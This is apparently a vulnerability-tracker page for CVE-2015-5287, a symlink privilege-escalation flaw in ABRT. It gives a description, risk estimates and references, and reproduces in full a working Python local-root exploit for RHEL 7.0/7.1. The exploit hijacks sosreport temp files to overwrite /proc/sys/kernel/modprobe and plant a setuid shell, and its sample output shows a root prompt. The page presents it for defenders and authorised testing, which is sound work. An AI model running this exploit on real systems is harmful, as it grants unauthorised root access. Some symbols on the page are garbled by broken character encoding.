CVE-2015-5287
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
7.9
Description
The abrt-hook-ccpp help program in Automatic Bug Reporting Tool (ABRT) before 2.7.1 allows local users with certain permissions to gain privileges via a symlink attack on a file with a predictable name, as demonstrated by /var/tmp/abrt/abrt-hax-coredump or /var/spool/abrt/abrt-hax-coredump.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation
#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015
# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory: /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport: sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles: ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release
# Red Hat Enterprise Linux Server release 7.1 (Maipo)
import os,sys,glob,time,sys,socket
payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"
pid = os.fork()
if pid == 0:
os.execl("/usr/bin/sleep","sleep","100")
time.sleep(0.5)
print "crashing pid %d" % pid
os.kill(pid,11)
print "waiting for dump directory"
def waitpath(p):
while 1:
r = glob.glob(p)
if len(r) > 0:
return r
time.sleep(0.05)
dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]
print "dump directory: ", dumpdir
os.chdir(dumpdir)
print "waiting for sosreport directory"
sosreport = waitpath("sosreport-*")[0]
print "sosreport: ", sosreport
print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")
print "tmpfiles: ", tmpfiles
print "moving directory"
os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)
os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")
print "moving tmpfiles"
for x in tmpfiles:
print "%s -> %s" % (x,x + ".old")
os.rename(x, x + ".old")
open(x, "w+").write("/tmp/hax.sh\n")
os.chmod(x,0666)
os.chdir("/")
sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")
def trigger():
open("/tmp/hax.sh","w+").write(payload)
os.chmod("/tmp/hax.sh",0755)
try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
except: pass
time.sleep(0.5)
try:
os.stat("/tmp/sh")
except:
print "could not create suid"
sys.exit(-1)
print "success"
os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
sys.exit(-1)
for x in xrange(0,60*10):
if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
print "done"
trigger()
time.sleep(1)
sys.stderr.write(".")
print "timed out"abrt (Centos 7.1 / Fedora 22) - Local Privilege Escalation
Source code queued for fetch โ refresh in a moment.
ABRT - sosreport Privilege Escalation (Metasploit)
Source code queued for fetch โ refresh in a moment.
Metasploit modules
Source code queued for fetch โ refresh in a moment.
OS impact
Red Hat Affected 1 release
| Version | Status | Fixed in |
|---|---|---|
| 7.0 | Affected | โ |
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| redhat | automatic_bug_reporting_tool | {"endIncluding":"2.7.0"} | |
References
- http://packetstormsecurity.com/files/154592/ABRT-sosreport-Privilege-Escalation.html
- http://rhn.redhat.com/errata/RHSA-2015-2505.html
- http://www.openwall.com/lists/oss-security/2015/12/01/1
- http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html
- http://www.securityfocus.com/bid/78137
- https://bugzilla.redhat.com/show_bug.cgi?id=1266837
- https://github.com/abrt/abrt/commit/3c1b60cfa62d39e5fff5a53a5bc53dae189e740e
- https://www.exploit-db.com/exploits/38832/
- http://packetstormsecurity.com/files/154592/ABRT-sosreport-Privilege-Escalation.html
- http://rhn.redhat.com/errata/RHSA-2015-2505.html
- http://www.openwall.com/lists/oss-security/2015/12/01/1
- http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html
- http://www.securityfocus.com/bid/78137
- https://bugzilla.redhat.com/show_bug.cgi?id=1266837
- https://github.com/abrt/abrt/commit/3c1b60cfa62d39e5fff5a53a5bc53dae189e740e
- https://www.exploit-db.com/exploits/38832/
CWEs
CWE-59
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.